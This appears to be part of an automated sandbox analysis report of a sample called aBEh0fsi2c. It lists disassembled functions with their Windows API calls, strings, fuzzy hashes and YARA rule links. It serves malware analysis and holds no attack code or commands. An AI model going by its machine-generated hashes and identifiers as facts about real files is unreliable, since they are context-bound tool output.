Opcode Fuzzy Hash: d43b1af3d4153c0ee10d2b3e13bb17a48c9d5b44b9b6934f4afa8ea90e5aa3bf
Instruction Fuzzy Hash: 0C41C571504309AFDB26EF34D842B7A73ECEF06310F2184AEE549DB295EA3199458B10

Function 003E7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003E716A
CreateMenu.USER32 ref: 003E7185
SetMenu.USER32(?,00000000), ref: 003E7194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E7221
IsMenu.USER32(?), ref: 003E7237
CreatePopupMenu.USER32 ref: 003E7241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003E726E
DrawMenuBar.USER32 ref: 003E7276

Strings

0, xrefs: 003E7160
F, xrefs: 003E7262

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 90b945406cc4f1e3dfd43082aba7d58a063386b4f52434290e4ba924abf718b6
Instruction ID: f9a96d6a6b848b31b394177bb134a5ab5474654dced76d3a0a81df6f0fe26a6f
Opcode Fuzzy Hash: 90b945406cc4f1e3dfd43082aba7d58a063386b4f52434290e4ba924abf718b6
Instruction Fuzzy Hash: AA418B74A01255EFDB21DF65E884EDA7BB9FF49300F154628FA059B390D771A910CF90

Function 003E74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003E755E
CreateCompatibleDC.GDI32(00000000), ref: 003E7565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003E7578
SelectObject.GDI32(00000000,00000000), ref: 003E7580
GetPixel.GDI32(00000000,00000000,00000000), ref: 003E758B
DeleteDC.GDI32(00000000), ref: 003E7594
GetWindowLongW.USER32(?,000000EC), ref: 003E759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003E75B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003E75BE

Strings

static, xrefs: 003E74F6

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 470a0b326435326e02718638c1a49f887262f29165e6d055e2973b1a040eacef
Instruction ID: dd9727c1ef3430c14b29751d8e86866885766670b765f714f5599b5130b845f3
Opcode Fuzzy Hash: 470a0b326435326e02718638c1a49f887262f29165e6d055e2973b1a040eacef
Instruction Fuzzy Hash: D2314B311041A4AFDF229F65DC48FEA3B69EF0A360F114325FA159A0E0C771D811DB64

Function 00386E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00386E3E

Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28

__gmtime64_s.LIBCMT ref: 00386ED7
__gmtime64_s.LIBCMT ref: 00386F0D
__gmtime64_s.LIBCMT ref: 00386F2A
__allrem.LIBCMT ref: 00386F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00386F9C
__allrem.LIBCMT ref: 00386FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00386FD1
__allrem.LIBCMT ref: 00386FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00387006
__invoke_watson.LIBCMT ref: 00387077

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 0e2aa96672b93929e9d3ad3ad2af52e460d1ddd8028a3ae429bc9c0867a51d97
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: E17118B6A00717ABDB16FF78DC42B5AB3A9AF04324F154269F514DB681E770ED408790

Function 003C2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003C2542
GetMenuItemInfoW.USER32(00425890,000000FF,00000000,00000030), ref: 003C25A3
SetMenuItemInfoW.USER32(00425890,00000004,00000000,00000030), ref: 003C25D9
Sleep.KERNEL32(000001F4), ref: 003C25EB
GetMenuItemCount.USER32(?), ref: 003C262F
GetMenuItemID.USER32(?,00000000), ref: 003C264B
GetMenuItemID.USER32(?,-00000001), ref: 003C2675
GetMenuItemID.USER32(?,?), ref: 003C26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003C2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C2735

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 38f60f574c66be1445e966f9c3aa66072c0445151f23b3d72795041f6a8d5440
Instruction ID: c92ebf092420adf6e46d6028ca54f78b7e99af665ee9335c4922232fa9e0b23b
Opcode Fuzzy Hash: 38f60f574c66be1445e966f9c3aa66072c0445151f23b3d72795041f6a8d5440
Instruction Fuzzy Hash: 8D617A74900249EFDB22DF64CC88EAFBBB8EB46304F15056DE842E7291D771AD15DB21

Function 003E6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003E6FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003E6FA8
GetWindowLongW.USER32(?,000000F0), ref: 003E6FCC
_memset.LIBCMT ref: 003E6FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E6FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003E7067

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 6382548fe3a6409434a88b966b73552afa5fc9f800f3794532607a477fe6dabd
Instruction ID: c44a6c44a9602b4559878fe6204464e5f0a16679e6fd5e7c12b6920680024a46
Opcode Fuzzy Hash: 6382548fe3a6409434a88b966b73552afa5fc9f800f3794532607a477fe6dabd
Instruction Fuzzy Hash: 47616C75A00258AFDB12DFA5DC81EEE77B8EB09710F104269FA14EB2E1C771AD41DB50

Function 003B6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003B6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 003B6C18
VariantInit.OLEAUT32(?), ref: 003B6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 003B6C4A
VariantCopy.OLEAUT32(?,?), ref: 003B6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 003B6CB1
VariantClear.OLEAUT32(?), ref: 003B6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 003B6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B6CDC
VariantClear.OLEAUT32(?), ref: 003B6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B6CF9

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 503642b5a7a68e1f356157adf28282ae0800ca75e0bd473524abdf81ae1c8d75
Instruction ID: 455aaadac2c57ab99dec0f220e1807d5859aaa1e8b9348c871cb255e6d3ebedf
Opcode Fuzzy Hash: 503642b5a7a68e1f356157adf28282ae0800ca75e0bd473524abdf81ae1c8d75
Instruction Fuzzy Hash: 3B4172319001199FCF12DFA5D885DEEBBBDEF08304F008169E955AB2A1CB74A945CF90

Function 003D5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 003D5793
inet_addr.WSOCK32(?), ref: 003D57D8
gethostbyname.WSOCK32(?), ref: 003D57E4
IcmpCreateFile.IPHLPAPI ref: 003D57F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003D5862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003D5878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 003D58ED
WSACleanup.WSOCK32 ref: 003D58F3

Strings

Ping, xrefs: 003D5816

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 2bab4da2775a9478b3136d6f138bdb9e237be1ab2dbbab96902f459448babb5a
Instruction ID: f68f8e112e60e7582b3bd21dc39567e5dcf89704a69177f93e63ec3fd6923cb3
Opcode Fuzzy Hash: 2bab4da2775a9478b3136d6f138bdb9e237be1ab2dbbab96902f459448babb5a
Instruction Fuzzy Hash: 7B5160726047009FDB229F24EC85B6A7BE8EF48710F15852AF956DB3E1DB70E904DB41

Function 003CB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003CB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003CB546
GetLastError.KERNEL32 ref: 003CB550
SetErrorMode.KERNEL32(00000000,READY), ref: 003CB5BD

Strings

INVALID, xrefs: 003CB58F
READY, xrefs: 003CB596
UNKNOWN, xrefs: 003CB575
READONLY, xrefs: 003CB588
NOTREADY, xrefs: 003CB57C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 675e1ae6434c8d5a36f288ae7529787041e2d5b78085b750a87a656984a1ad7f
Instruction ID: 4fd1f8ede322d6ec35c4ea8b2e5d407735ca3b636d81c6563b8658d8f6b4b617
Opcode Fuzzy Hash: 675e1ae6434c8d5a36f288ae7529787041e2d5b78085b750a87a656984a1ad7f
Instruction Fuzzy Hash: 5831A235A40209DFCB12EB68C886FADB7B8EF46310F10812EF505DB291DB719E46CB40

Function 003B8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003B9014
GetDlgCtrlID.USER32 ref: 003B901F
GetParent.USER32 ref: 003B903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 003B903E
GetDlgCtrlID.USER32(?), ref: 003B9047
GetParent.USER32(?), ref: 003B9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 003B9066

Strings

ListBox, xrefs: 003B8FD1
ComboBox, xrefs: 003B8F9C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: a76f3e8eff095352e97386b9004477baead8af1d5a716d5464594ea696b2e872
Instruction ID: 66097b0db8f9d8894c910e9bed2750b433406b42a2e6d11080a7b60838521c67
Opcode Fuzzy Hash: a76f3e8eff095352e97386b9004477baead8af1d5a716d5464594ea696b2e872
Instruction Fuzzy Hash: 0721F870A00148BFDF16ABA0CC85EFEBB78EF45310F10421AFA619B2E1DB795815DB20

Function 003B907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003B90FD
GetDlgCtrlID.USER32 ref: 003B9108
GetParent.USER32 ref: 003B9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 003B9127
GetDlgCtrlID.USER32(?), ref: 003B9130
GetParent.USER32(?), ref: 003B914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 003B914F

Strings

ListBox, xrefs: 003B90BC
ComboBox, xrefs: 003B9087

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 4eb9b38e256c53a715850f7dd550540b25e4dc252bc73eee275fa942ae6e34a0
Instruction ID: c0ef677df9af5fdfb6554325ae050663006b3d435c3d241aa61bc28442032cbb
Opcode Fuzzy Hash: 4eb9b38e256c53a715850f7dd550540b25e4dc252bc73eee275fa942ae6e34a0
Instruction Fuzzy Hash: AF21C575A00148BFDF12ABA4CC85FFEBBB8EF44300F104116BA519B2A6DB759955DB20

Function 003B9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 003B916F
GetClassNameW.USER32(00000000,?,00000100), ref: 003B9184
_wcscmp.LIBCMT ref: 003B9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003B9211

Strings

details, xrefs: 003B91BF
list, xrefs: 003B91F3
smallicons, xrefs: 003B91D9
SHELLDLL_DefView, xrefs: 003B9190
largeicons, xrefs: 003B91A5

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 2c59795b87d88ce78261c8c3677ad36871d86e5f626ace531bbf87e8bb62734f
Instruction ID: 0cf7add47df7fa43250434b98afe61c40f08e17ccd4e354f05c41443cec0abc4
Opcode Fuzzy Hash: 2c59795b87d88ce78261c8c3677ad36871d86e5f626ace531bbf87e8bb62734f
Instruction Fuzzy Hash: CE110D7A6883077AFA133624DC06FE7379C9B15764B300457FB00AC8D1EE6169515658

Function 003C7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003C7A6C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 6c70448d4b1c7c699e295d0ebbda0af7772ae99cbe2a9331393618aed0b814bf
Instruction ID: 8a919983f27f6f705bfc2aef712300a89c12f3ac29e293452b5515f8e0e72796
Opcode Fuzzy Hash: 6c70448d4b1c7c699e295d0ebbda0af7772ae99cbe2a9331393618aed0b814bf
Instruction Fuzzy Hash: 26B17B7190420A9FDB12DFA5C885FBEB7B8EF09321F218469E901EB291D774AD41CF90

Function 003C11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 003C11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C1204
GetWindowThreadProcessId.USER32(00000000), ref: 003C120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 003C122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C12BC

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2dfbee637dd2abb5ecdaa749aed41a06e50545d4a027a5e039241e902d52b933
Instruction ID: 54a2c79dd0e5dd300c4e984aa774cfef33a299f9bb0c04edd65e69cdb90ae413
Opcode Fuzzy Hash: 2dfbee637dd2abb5ecdaa749aed41a06e50545d4a027a5e039241e902d52b933
Instruction Fuzzy Hash: 7E31D279600208FFDF329F54ED88F6A37ADEB56311F138629FA01CA1A1DBB49D409B54

Function 0036FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0036FAA6
OleUninitialize.OLE32(?,00000000), ref: 0036FB45
UnregisterHotKey.USER32(?), ref: 0036FC9C
DestroyWindow.USER32(?), ref: 003A45D6
FreeLibrary.KERNEL32(?), ref: 003A463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 003A4668

Strings

close all, xrefs: 0036FAA1

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 3ce72fe5271e583f7831800547455ea47578f9fe3e317b5339355523226a8422
Instruction ID: f9151d903fa88e7a1682ca0294e1c797bbb18a0a783b0532f3acbd0704c09a86
Opcode Fuzzy Hash: 3ce72fe5271e583f7831800547455ea47578f9fe3e317b5339355523226a8422
Instruction Fuzzy Hash: 95A15831701212CFCB2AEF14D995A69F7A4FF56700F1582ADE80AAB265CB70AD16CF50

Function 003D9113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003D9167
VariantInit.OLEAUT32(?), ref: 003D9238
VariantInit.OLEAUT32(?), ref: 003D9339
VariantClear.OLEAUT32(?), ref: 003D9343
VariantClear.OLEAUT32(?), ref: 003D93A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 003D91C8, 003D92F6, 003D93AE
Incorrect Object type in FOR..IN loop, xrefs: 003D931C
,,?, xrefs: 003D91E5

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,?$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-1974717164
Opcode ID: f88e17369e59c780aa5890393a9120ab23b7ba0d88ab9d2ffeeb447840429d04
Instruction ID: 9a7209d5ab0b6927d4aeac4aa2599f82439873f2efc1e81d544ffe3786caaafd
Opcode Fuzzy Hash: f88e17369e59c780aa5890393a9120ab23b7ba0d88ab9d2ffeeb447840429d04
Instruction Fuzzy Hash: 2791AE72A00209ABDF26DFA5DC48FAEBBB8EF45710F10855BF515AB280D7709945CFA0

